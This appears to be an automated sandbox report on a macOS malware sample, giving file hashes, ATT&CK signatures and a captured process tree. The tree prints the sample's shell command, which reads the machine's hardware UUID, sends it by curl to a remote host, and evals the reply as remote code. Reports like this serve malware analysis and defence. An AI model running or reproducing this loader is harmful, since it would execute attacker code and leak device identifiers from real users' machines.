Analysis

  • max time kernel
    93s
  • max time network
    167s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b

  • Size

    48KB

  • MD5

    c7049a42302fa05ac17127b788fe5da5

  • SHA1

    61852110485fa2234e54ffae923e44c9722aeaaf

  • SHA256

    0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b

  • SHA512

    e12c5bd638f8116893a472513ba07bd8b01065622c8ecce8305b0044d2079a385a3a4a290ef360564b77e49a829f5aa4582486c4030ad874b2abde829ddbe513

  • SSDEEP

    24:xKA/8C28ekM6S98SczqaycObLmJLyxjFqUDhMK3iWAbO7fec48u6f4xu6Dj6sR+r:xlOdTh3mtyx8UFM5HbO7z4x+H6Dj6s6

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

  • Queries the hardware information (I/O Kit registry). 1 TTPs 1 IoCs

    An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b\""
    1⤵
      PID:481
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b\""
      1⤵
        PID:481
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
        1⤵
          PID:481
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
            2⤵
              PID:482
            • /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
              /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
              2⤵
                PID:482
            • /bin/sh
              sh -c "MACHINEID=\"\$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()' -)\";CONTENT=\$(curl --connect-timeout 900 -L \"https://api.macsnipper.com/v9/hbold?machine_id=\$MACHINEID&pr=macsnipper\");eval \"\$CONTENT\""
              1⤵
                PID:483
              • /bin/bash
                sh -c "MACHINEID=\"\$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()' -)\";CONTENT=\$(curl --connect-timeout 900 -L \"https://api.macsnipper.com/v9/hbold?machine_id=\$MACHINEID&pr=macsnipper\");eval \"\$CONTENT\""
                1⤵
                  PID:483
                • /usr/sbin/ioreg
                  ioreg -ad2 -c IOPlatformExpertDevice
                  1⤵
                    PID:485
                  • /usr/bin/xmllint
                    xmllint --xpath "//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()" -
                    1⤵
                      PID:486
                    • /usr/bin/curl
                      curl --connect-timeout 900 -L "https://api.macsnipper.com/v9/hbold?machine_id=79C87F0E-9227-5AAD-AA91-25F794E1F52E&pr=macsnipper"
                      1⤵
                        PID:488
                      • /usr/libexec/xpcproxy
                        xpcproxy com.apple.nsurlstoraged
                        1⤵
                          PID:491
                        • /usr/libexec/nsurlstoraged
                          /usr/libexec/nsurlstoraged --privileged
                          1⤵
                            PID:491

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • /var/db/nsurlstoraged/dafsaData.bin

                            Filesize

                            54KB

                            MD5

                            64f469698e53d0c828b7f90acd306082

                            SHA1

                            bcc041b3849e1b0b4104ffeb46002207eeac54f3

                            SHA256

                            d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

                            SHA512

                            a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f